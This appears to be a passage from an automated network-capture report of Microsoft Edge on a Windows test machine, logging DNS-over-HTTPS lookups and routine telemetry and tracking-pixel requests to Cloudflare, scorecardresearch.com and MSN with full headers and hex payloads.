                                                                                                                                                                                                                                                                                  2025-01-03 22:32:43 UTC468INData Raw: 00 00 81 80 00 01 00 01 00 00 00 01 03 77 77 77 07 67 73 74 61 74 69 63 03 63 6f 6d 00 00 01 00 01 c0 0c 00 01 00 01 00 00 01 29 00 04 8e fa 40 63 00 00 29 04 d0 00 00 00 00 01 98 00 0c 01 94 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
                                                                                                                                                                                                                                                                                  Data Ascii: wwwgstaticcom)@c)


                                                                                                                                                                                                                                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                                  5192.168.2.449778162.159.61.34437628C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                  TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                  2025-01-03 22:32:43 UTC245OUTPOST /dns-query HTTP/1.1
                                                                                                                                                                                                                                                                                  Host: chrome.cloudflare-dns.com
                                                                                                                                                                                                                                                                                  Connection: keep-alive
                                                                                                                                                                                                                                                                                  Content-Length: 128
                                                                                                                                                                                                                                                                                  Accept: application/dns-message
                                                                                                                                                                                                                                                                                  Accept-Language: *
                                                                                                                                                                                                                                                                                  User-Agent: Chrome
                                                                                                                                                                                                                                                                                  Accept-Encoding: identity
                                                                                                                                                                                                                                                                                  Content-Type: application/dns-message
                                                                                                                                                                                                                                                                                  2025-01-03 22:32:43 UTC128OUTData Raw: 00 00 01 00 00 01 00 00 00 00 00 01 03 77 77 77 07 67 73 74 61 74 69 63 03 63 6f 6d 00 00 01 00 01 00 00 29 10 00 00 00 00 00 00 54 00 0c 00 50 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
                                                                                                                                                                                                                                                                                  Data Ascii: wwwgstaticcom)TP
                                                                                                                                                                                                                                                                                  2025-01-03 22:32:43 UTC247INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                  Server: cloudflare
                                                                                                                                                                                                                                                                                  Date: Fri, 03 Jan 2025 22:32:43 GMT
                                                                                                                                                                                                                                                                                  Content-Type: application/dns-message
                                                                                                                                                                                                                                                                                  Connection: close
                                                                                                                                                                                                                                                                                  Access-Control-Allow-Origin: *
                                                                                                                                                                                                                                                                                  Content-Length: 468
                                                                                                                                                                                                                                                                                  CF-RAY: 8fc672472e3680d3-EWR
                                                                                                                                                                                                                                                                                  alt-svc: h3=":443"; ma=86400
                                                                                                                                                                                                                                                                                  2025-01-03 22:32:43 UTC468INData Raw: 00 00 81 80 00 01 00 01 00 00 00 01 03 77 77 77 07 67 73 74 61 74 69 63 03 63 6f 6d 00 00 01 00 01 c0 0c 00 01 00 01 00 00 00 f8 00 04 8e fa 40 43 00 00 29 04 d0 00 00 00 00 01 98 00 0c 01 94 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
                                                                                                                                                                                                                                                                                  Data Ascii: wwwgstaticcom@C)


                                                                                                                                                                                                                                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                                  6192.168.2.449780162.159.61.34437628C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                  TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                  2025-01-03 22:32:43 UTC245OUTPOST /dns-query HTTP/1.1
                                                                                                                                                                                                                                                                                  Host: chrome.cloudflare-dns.com
                                                                                                                                                                                                                                                                                  Connection: keep-alive
                                                                                                                                                                                                                                                                                  Content-Length: 128
                                                                                                                                                                                                                                                                                  Accept: application/dns-message
                                                                                                                                                                                                                                                                                  Accept-Language: *
                                                                                                                                                                                                                                                                                  User-Agent: Chrome
                                                                                                                                                                                                                                                                                  Accept-Encoding: identity
                                                                                                                                                                                                                                                                                  Content-Type: application/dns-message
                                                                                                                                                                                                                                                                                  2025-01-03 22:32:43 UTC128OUTData Raw: 00 00 01 00 00 01 00 00 00 00 00 01 03 77 77 77 07 67 73 74 61 74 69 63 03 63 6f 6d 00 00 01 00 01 00 00 29 10 00 00 00 00 00 00 54 00 0c 00 50 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
                                                                                                                                                                                                                                                                                  Data Ascii: wwwgstaticcom)TP
                                                                                                                                                                                                                                                                                  2025-01-03 22:32:43 UTC247INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                  Server: cloudflare
                                                                                                                                                                                                                                                                                  Date: Fri, 03 Jan 2025 22:32:43 GMT
                                                                                                                                                                                                                                                                                  Content-Type: application/dns-message
                                                                                                                                                                                                                                                                                  Connection: close
                                                                                                                                                                                                                                                                                  Access-Control-Allow-Origin: *
                                                                                                                                                                                                                                                                                  Content-Length: 468
                                                                                                                                                                                                                                                                                  CF-RAY: 8fc67247991672c2-EWR
                                                                                                                                                                                                                                                                                  alt-svc: h3=":443"; ma=86400
                                                                                                                                                                                                                                                                                  2025-01-03 22:32:43 UTC468INData Raw: 00 00 81 80 00 01 00 01 00 00 00 01 03 77 77 77 07 67 73 74 61 74 69 63 03 63 6f 6d 00 00 01 00 01 c0 0c 00 01 00 01 00 00 01 1a 00 04 8e fb 28 c3 00 00 29 04 d0 00 00 00 00 01 98 00 0c 01 94 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
                                                                                                                                                                                                                                                                                  Data Ascii: wwwgstaticcom()


                                                                                                                                                                                                                                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                                  7192.168.2.44976313.32.110.1044437628C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                  TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                  2025-01-03 22:32:45 UTC925OUTGET /b?rn=1735943564647&c1=2&c2=3000001&cs_ucfr=1&c7=https%3A%2F%2Fntp.msn.com%2Fedge%2Fntp%3Flocale%3Den-GB%26title%3DNew%2Btab%26dsp%3D1%26sp%3DBing%26isFREModalBackground%3D1%26startpage%3D1%26PC%3DU531%26ocid%3Dmsedgdhp%26mkt%3Den-us&c8=New+tab&c9=&cs_fpid=035D89D9374366AE1C219CB0365A672A&cs_fpit=o&cs_fpdm=*null&cs_fpdt=*null HTTP/1.1
                                                                                                                                                                                                                                                                                  Host: sb.scorecardresearch.com
                                                                                                                                                                                                                                                                                  Connection: keep-alive
                                                                                                                                                                                                                                                                                  sec-ch-ua: "Microsoft Edge";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                                                                                                                                                                                                                  sec-ch-ua-mobile: ?0
                                                                                                                                                                                                                                                                                  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 Edg/117.0.2045.47
                                                                                                                                                                                                                                                                                  sec-ch-ua-platform: "Windows"
                                                                                                                                                                                                                                                                                  Accept: image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8
                                                                                                                                                                                                                                                                                  Sec-Fetch-Site: cross-site
                                                                                                                                                                                                                                                                                  Sec-Fetch-Mode: no-cors
                                                                                                                                                                                                                                                                                  Sec-Fetch-Dest: image
                                                                                                                                                                                                                                                                                  Referer: https://ntp.msn.com/
                                                                                                                                                                                                                                                                                  Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                                                                                                                  Accept-Language: en-GB,en;q=0.9,en-US;q=0.8
                                                                                                                                                                                                                                                                                  2025-01-03 22:32:45 UTC955INHTTP/1.1 302 Found
                                                                                                                                                                                                                                                                                  Content-Length: 0
                                                                                                                                                                                                                                                                                  Connection: close
                                                                                                                                                                                                                                                                                  Date: Fri, 03 Jan 2025 22:32:45 GMT
                                                                                                                                                                                                                                                                                  Location: /b2?rn=1735943564647&c1=2&c2=3000001&cs_ucfr=1&c7=https%3A%2F%2Fntp.msn.com%2Fedge%2Fntp%3Flocale%3Den-GB%26title%3DNew%2Btab%26dsp%3D1%26sp%3DBing%26isFREModalBackground%3D1%26startpage%3D1%26PC%3DU531%26ocid%3Dmsedgdhp%26mkt%3Den-us&c8=New+tab&c9=&cs_fpid=035D89D9374366AE1C219CB0365A672A&cs_fpit=o&cs_fpdm=*null&cs_fpdt=*null
                                                                                                                                                                                                                                                                                  set-cookie: UID=1DBdcc8eac98d38a8586d401735943565; SameSite=None; Secure; domain=.scorecardresearch.com; path=/; max-age=33696000
                                                                                                                                                                                                                                                                                  set-cookie: XID=1DBdcc8eac98d38a8586d401735943565; SameSite=None; Secure; Partitioned; domain=.scorecardresearch.com; path=/; max-age=33696000
                                                                                                                                                                                                                                                                                  Accept-CH: UA, Platform, Arch, Model, Mobile
                                                                                                                                                                                                                                                                                  X-Cache: Miss from cloudfront
                                                                                                                                                                                                                                                                                  Via: 1.1 de5338eac881cf5d87f2d811c3b7417c.cloudfront.net (CloudFront)
                                                                                                                                                                                                                                                                                  X-Amz-Cf-Pop: VIE50-C2
                                                                                                                                                                                                                                                                                  X-Amz-Cf-Id: _DCslhmLq5v8mdjRIY1y_HAuczyLzPM75VUTnlS46stNeyNf1y604w==


                                                                                                                                                                                                                                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                                  8192.168.2.449797162.159.61.34437628C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                  TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                  2025-01-03 22:32:45 UTC245OUTPOST /dns-query HTTP/1.1
                                                                                                                                                                                                                                                                                  Host: chrome.cloudflare-dns.com
                                                                                                                                                                                                                                                                                  Connection: keep-alive
                                                                                                                                                                                                                                                                                  Content-Length: 128
                                                                                                                                                                                                                                                                                  Accept: application/dns-message
                                                                                                                                                                                                                                                                                  Accept-Language: *
                                                                                                                                                                                                                                                                                  User-Agent: Chrome
                                                                                                                                                                                                                                                                                  Accept-Encoding: identity
                                                                                                                                                                                                                                                                                  Content-Type: application/dns-message
                                                                                                                                                                                                                                                                                  2025-01-03 22:32:45 UTC128OUTData Raw: 00 00 01 00 00 01 00 00 00 00 00 01 09 64 61 74 61 2d 65 64 67 65 0b 73 6d 61 72 74 73 63 72 65 65 6e 09 6d 69 63 72 6f 73 6f 66 74 03 63 6f 6d 00 00 41 00 01 00 00 29 10 00 00 00 00 00 00 40 00 0c 00 3c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
                                                                                                                                                                                                                                                                                  Data Ascii: data-edgesmartscreenmicrosoftcomA)@<
                                                                                                                                                                                                                                                                                  2025-01-03 22:32:45 UTC247INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                  Server: cloudflare
                                                                                                                                                                                                                                                                                  Date: Fri, 03 Jan 2025 22:32:45 GMT
                                                                                                                                                                                                                                                                                  Content-Type: application/dns-message
                                                                                                                                                                                                                                                                                  Connection: close
                                                                                                                                                                                                                                                                                  Access-Control-Allow-Origin: *
                                                                                                                                                                                                                                                                                  Content-Length: 468
                                                                                                                                                                                                                                                                                  CF-RAY: 8fc672550c750f8b-EWR
                                                                                                                                                                                                                                                                                  alt-svc: h3=":443"; ma=86400
                                                                                                                                                                                                                                                                                  2025-01-03 22:32:45 UTC468INData Raw: 00 00 81 80 00 01 00 02 00 01 00 01 09 64 61 74 61 2d 65 64 67 65 0b 73 6d 61 72 74 73 63 72 65 65 6e 09 6d 69 63 72 6f 73 6f 66 74 03 63 6f 6d 00 00 41 00 01 c0 0c 00 05 00 01 00 00 0c 74 00 26 11 70 72 6f 64 2d 61 74 6d 2d 77 64 73 2d 65 64 67 65 0e 74 72 61 66 66 69 63 6d 61 6e 61 67 65 72 03 6e 65 74 00 c0 41 00 05 00 01 00 00 00 da 00 30 0f 70 72 6f 64 2d 61 67 69 63 2d 6e 63 75 2d 33 0e 6e 6f 72 74 68 63 65 6e 74 72 61 6c 75 73 08 63 6c 6f 75 64 61 70 70 05 61 7a 75 72 65 c0 2c c0 83 00 06 00 01 00 00 00 3c 00 30 06 6e 73 31 2d 30 32 09 61 7a 75 72 65 2d 64 6e 73 c0 2c 06 6d 73 6e 68 73 74 c0 22 00 00 27 11 00 00 03 84 00 00 01 2c 00 09 3a 80 00 00 00 3c 00 00 29 04 d0 00 00 00 00 00 ea 00 0c 00 e6 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
                                                                                                                                                                                                                                                                                  Data Ascii: data-edgesmartscreenmicrosoftcomAt&prod-atm-wds-edgetrafficmanagernetA0prod-agic-ncu-3northcentraluscloudappazure,<0ns1-02azure-dns,msnhst"',:<)


                                                                                                                                                                                                                                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                                  9192.168.2.449796162.159.61.34437628C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                  TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                  2025-01-03 22:32:45 UTC245OUTPOST /dns-query HTTP/1.1
                                                                                                                                                                                                                                                                                  Host: chrome.cloudflare-dns.com
                                                                                                                                                                                                                                                                                  Connection: keep-alive
                                                                                                                                                                                                                                                                                  Content-Length: 128
                                                                                                                                                                                                                                                                                  Accept: application/dns-message
                                                                                                                                                                                                                                                                                  Accept-Language: *
                                                                                                                                                                                                                                                                                  User-Agent: Chrome
                                                                                                                                                                                                                                                                                  Accept-Encoding: identity
                                                                                                                                                                                                                                                                                  Content-Type: application/dns-message
                                                                                                                                                                                                                                                                                  2025-01-03 22:32:45 UTC128OUTData Raw: 00 00 01 00 00 01 00 00 00 00 00 01 09 64 61 74 61 2d 65 64 67 65 0b 73 6d 61 72 74 73 63 72 65 65 6e 09 6d 69 63 72 6f 73 6f 66 74 03 63 6f 6d 00 00 01 00 01 00 00 29 10 00 00 00 00 00 00 40 00 0c 00 3c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
                                                                                                                                                                                                                                                                                  Data Ascii: data-edgesmartscreenmicrosoftcom)@<
                                                                                                                                                                                                                                                                                  2025-01-03 22:32:45 UTC247INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                  Server: cloudflare
                                                                                                                                                                                                                                                                                  Date: Fri, 03 Jan 2025 22:32:45 GMT
                                                                                                                                                                                                                                                                                  Content-Type: application/dns-message
                                                                                                                                                                                                                                                                                  Connection: close
                                                                                                                                                                                                                                                                                  Access-Control-Allow-Origin: *
                                                                                                                                                                                                                                                                                  Content-Length: 468
                                                                                                                                                                                                                                                                                  CF-RAY: 8fc67254fe95de92-EWR
                                                                                                                                                                                                                                                                                  alt-svc: h3=":443"; ma=86400
                                                                                                                                                                                                                                                                                  2025-01-03 22:32:45 UTC468INData Raw: 00 00 81 80 00 01 00 03 00 00 00 01 09 64 61 74 61 2d 65 64 67 65 0b 73 6d 61 72 74 73 63 72 65 65 6e 09 6d 69 63 72 6f 73 6f 66 74 03 63 6f 6d 00 00 01 00 01 c0 0c 00 05 00 01 00 00 0a 87 00 26 11 70 72 6f 64 2d 61 74 6d 2d 77 64 73 2d 65 64 67 65 0e 74 72 61 66 66 69 63 6d 61 6e 61 67 65 72 03 6e 65 74 00 c0 41 00 05 00 01 00 00 00 2c 00 29 0f 70 72 6f 64 2d 61 67 69 63 2d 65 75 32 2d 31 07 65 61 73 74 75 73 32 08 63 6c 6f 75 64 61 70 70 05 61 7a 75 72 65 c0 2c c0 73 00 01 00 01 00 00 00 0a 00 04 04 99 1d 34 00 00 29 04 d0 00 00 00 00 01 1d 00 0c 01 19 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
                                                                                                                                                                                                                                                                                  Data Ascii: data-edgesmartscreenmicrosoftcom&prod-atm-wds-edgetrafficmanagernetA,)prod-agic-eu2-1eastus2cloudappazure,s4)


                                                                                                                                                                                                                                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                                  10192.168.2.449798104.46.162.2244437628C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                  TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                  2025-01-03 22:32:46 UTC1082OUTPOST /OneCollector/1.0?cors=true&content-type=application/x-json-stream&client-id=NO_AUTH&client-version=1DS-Web-JS-3.2.8&apikey=0ded60c75e44443aa3484c42c1c43fe8-9fc57d3f-fdac-4bcf-b927-75eafe60192e-7279&upload-time=1735943564645&time-delta-to-apply-millis=use-collector-delta&w=0&anoncknm=app_anon&NoResponseBody=true HTTP/1.1
                                                                                                                                                                                                                                                                                  Host: browser.events.data.msn.com
                                                                                                                                                                                                                                                                                  Connection: keep-alive
                                                                                                                                                                                                                                                                                  Content-Length: 3869
                                                                                                                                                                                                                                                                                  sec-ch-ua: "Microsoft Edge";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                                                                                                                                                                                                                  sec-ch-ua-platform: "Windows"
                                                                                                                                                                                                                                                                                  sec-ch-ua-mobile: ?0
                                                                                                                                                                                                                                                                                  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 Edg/117.0.2045.47
                                                                                                                                                                                                                                                                                  Content-Type: text/plain;charset=UTF-8
                                                                                                                                                                                                                                                                                  Accept: */*
                                                                                                                                                                                                                                                                                  Origin: https://ntp.msn.com
                                                                                                                                                                                                                                                                                  Sec-Fetch-Site: same-site
                                                                                                                                                                                                                                                                                  Sec-Fetch-Mode: no-cors
                                                                                                                                                                                                                                                                                  Sec-Fetch-Dest: empty
                                                                                                                                                                                                                                                                                  Referer: https://ntp.msn.com/
                                                                                                                                                                                                                                                                                  Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                                                                                                                  Accept-Language: en-GB,en;q=0.9,en-US;q=0.8
                                                                                                                                                                                                                                                                                  Cookie: _C_ETH=1; USRLOC=; MUID=035D89D9374366AE1C219CB0365A672A; _EDGE_S=F=1&SID=39D765F2EF9B679519F0709BEEE166BB; _EDGE_V=1
                                                                                                                                                                                                                                                                                  2025-01-03 22:32:46 UTC3869OUTData Raw: 7b 22 6e 61 6d 65 22 3a 22 4d 53 2e 4e 65 77 73 2e 57 65 62 2e 50 61 67 65 56 69 65 77 22 2c 22 74 69 6d 65 22 3a 22 32 30 32 35 2d 30 31 2d 30 33 54 32 32 3a 33 32 3a 34 34 2e 36 34 30 5a 22 2c 22 76 65 72 22 3a 22 34 2e 30 22 2c 22 69 4b 65 79 22 3a 22 6f 3a 30 64 65 64 36 30 63 37 35 65 34 34 34 34 33 61 61 33 34 38 34 63 34 32 63 31 63 34 33 66 65 38 22 2c 22 65 78 74 22 3a 7b 22 73 64 6b 22 3a 7b 22 76 65 72 22 3a 22 31 44 53 2d 57 65 62 2d 4a 53 2d 33 2e 32 2e 38 22 2c 22 73 65 71 22 3a 31 2c 22 69 6e 73 74 61 6c 6c 49 64 22 3a 22 38 64 33 35 64 33 30 65 2d 63 30 65 64 2d 34 38 30 36 2d 61 64 30 32 2d 39 31 36 35 63 65 62 33 34 36 30 31 22 2c 22 65 70 6f 63 68 22 3a 22 33 34 30 39 33 34 38 31 31 32 22 7d 2c 22 61 70 70 22 3a 7b 22 6c 6f 63 61 6c 65
                                                                                                                                                                                                                                                                                  Data Ascii: {"name":"MS.News.Web.PageView","time":"2025-01-03T22:32:44.640Z","ver":"4.0","iKey":"o:0ded60c75e44443aa3484c42c1c43fe8","ext":{"sdk":{"ver":"1DS-Web-JS-3.2.8","seq":1,"installId":"8d35d30e-c0ed-4806-ad02-9165ceb34601","epoch":"3409348112"},"app":{"locale
                                                                                                                                                                                                                                                                                  2025-01-03 22:32:46 UTC890INHTTP/1.1 204 No Content
                                                                                                                                                                                                                                                                                  Content-Length: 0
                                                                                                                                                                                                                                                                                  Server: Microsoft-HTTPAPI/2.0
                                                                                                                                                                                                                                                                                  Strict-Transport-Security: max-age=31536000
                                                                                                                                                                                                                                                                                  P3P: CP="ALL IND DSP COR ADM CONo CUR CUSo IVAo IVDo PSA PSD TAI TELo OUR SAMo CNT COM INT NAV ONL PHY PRE PUR UNI"
                                                                                                                                                                                                                                                                                  Set-Cookie: MC1=GUID=4abaee18c5fa467c89b53f3b1a65aae4&HASH=4aba&LV=202501&V=4&LU=1735943566550; Domain=.microsoft.com; Expires=Sat, 03 Jan 2026 22:32:46 GMT; Path=/;Secure; SameSite=None
                                                                                                                                                                                                                                                                                  Set-Cookie: MS0=6851c84eec654e96ae9b98bbc0fa172f; Domain=.microsoft.com; Expires=Fri, 03 Jan 2025 23:02:46 GMT; Path=/;Secure; SameSite=None
                                                                                                                                                                                                                                                                                  time-delta-millis: 1905
                                                                                                                                                                                                                                                                                  Access-Control-Allow-Headers: P3P,Set-Cookie,time-delta-millis
                                                                                                                                                                                                                                                                                  Access-Control-Allow-Methods: POST
                                                                                                                                                                                                                                                                                  Access-Control-Allow-Credentials: true
                                                                                                                                                                                                                                                                                  Access-Control-Allow-Origin: https://ntp.msn.com
                                                                                                                                                                                                                                                                                  Access-Control-Expose-Headers: time-delta-millis
                                                                                                                                                                                                                                                                                  Date: Fri, 03 Jan 2025 22:32:46 GMT
                                                                                                                                                                                                                                                                                  Connection: close


                                                                                                                                                                                                                                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                                  11192.168.2.44980818.238.49.524437628C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                  TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                  2025-01-03 22:32:46 UTC1012OUTGET /b2?rn=1735943564647&c1=2&c2=3000001&cs_ucfr=1&c7=https%3A%2F%2Fntp.msn.com%2Fedge%2Fntp%3Flocale%3Den-GB%26title%3DNew%2Btab%26dsp%3D1%26sp%3DBing%26isFREModalBackground%3D1%26startpage%3D1%26PC%3DU531%26ocid%3Dmsedgdhp%26mkt%3Den-us&c8=New+tab&c9=&cs_fpid=035D89D9374366AE1C219CB0365A672A&cs_fpit=o&cs_fpdm=*null&cs_fpdt=*null HTTP/1.1
                                                                                                                                                                                                                                                                                  Host: sb.scorecardresearch.com
                                                                                                                                                                                                                                                                                  Connection: keep-alive
                                                                                                                                                                                                                                                                                  sec-ch-ua: "Microsoft Edge";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                                                                                                                                                                                                                  sec-ch-ua-mobile: ?0
                                                                                                                                                                                                                                                                                  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 Edg/117.0.2045.47
                                                                                                                                                                                                                                                                                  sec-ch-ua-platform: "Windows"
                                                                                                                                                                                                                                                                                  Accept: image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8
                                                                                                                                                                                                                                                                                  Sec-Fetch-Site: cross-site
                                                                                                                                                                                                                                                                                  Sec-Fetch-Mode: no-cors
                                                                                                                                                                                                                                                                                  Sec-Fetch-Dest: image
                                                                                                                                                                                                                                                                                  Referer: https://ntp.msn.com/
                                                                                                                                                                                                                                                                                  Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                                                                                                                  Accept-Language: en-GB,en;q=0.9,en-US;q=0.8
                                                                                                                                                                                                                                                                                  Cookie: UID=1DBdcc8eac98d38a8586d401735943565; XID=1DBdcc8eac98d38a8586d401735943565
                                                                                                                                                                                                                                                                                  2025-01-03 22:32:46 UTC326INHTTP/1.1 204 No Content
                                                                                                                                                                                                                                                                                  Connection: close
                                                                                                                                                                                                                                                                                  Date: Fri, 03 Jan 2025 22:32:46 GMT
                                                                                                                                                                                                                                                                                  Accept-CH: UA, Platform, Arch, Model, Mobile
                                                                                                                                                                                                                                                                                  X-Cache: Miss from cloudfront
                                                                                                                                                                                                                                                                                  Via: 1.1 d2b8f634cf8ac5ec77dee366297223bc.cloudfront.net (CloudFront)
                                                                                                                                                                                                                                                                                  X-Amz-Cf-Pop: JFK52-P3
                                                                                                                                                                                                                                                                                  X-Amz-Cf-Id: UWq1UVzjiVS_ju_Vwps3WES7LIhgxwUAFDf_BbAF1RPky56bJz2jsg==


                                                                                                                                                                                                                                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                                  12192.168.2.44980920.110.205.1194437628C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                  TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                  2025-01-03 22:32:46 UTC1261OUTGET /c.gif?rnd=1735943564647&udc=true&pg.n=default&pg.t=dhp&pg.c=547&pg.p=anaheim&rf=&tp=https%3A%2F%2Fntp.msn.com%2Fedge%2Fntp%3Flocale%3Den-GB%26title%3DNew%2520tab%26dsp%3D1%26sp%3DBing%26isFREModalBackground%3D1%26startpage%3D1%26PC%3DU531%26ocid%3Dmsedgdhp&cvs=Browser&di=340&st.dpt=&st.sdpt=antp&subcvs=homepage&lng=en-us&rid=5a52ed0c294f4f41b8f4e067b1be6fff&activityId=5a52ed0c294f4f41b8f4e067b1be6fff&d.imd=false&scr=1280x1024&anoncknm=app_anon&issso=&aadState=0&ctsa=mr&CtsSyncId=168B4F4B4C3749C99CB580CDBEB608F0&MUID=035D89D9374366AE1C219CB0365A672A HTTP/1.1
                                                                                                                                                                                                                                                                                  Host: c.msn.com
                                                                                                                                                                                                                                                                                  Connection: keep-alive
                                                                                                                                                                                                                                                                                  sec-ch-ua: "Microsoft Edge";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                                                                                                                                                                                                                  sec-ch-ua-mobile: ?0
                                                                                                                                                                                                                                                                                  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 Edg/117.0.2045.47
                                                                                                                                                                                                                                                                                  sec-ch-ua-platform: "Windows"
                                                                                                                                                                                                                                                                                  Accept: image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8
                                                                                                                                                                                                                                                                                  Sec-Fetch-Site: cross-site
                                                                                                                                                                                                                                                                                  Sec-Fetch-Mode: no-cors
                                                                                                                                                                                                                                                                                  Sec-Fetch-Dest: image
                                                                                                                                                                                                                                                                                  Referer: https://ntp.msn.com/
                                                                                                                                                                                                                                                                                  Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                                                                                                                  Accept-Language: en-GB,en;q=0.9,en-US;q=0.8
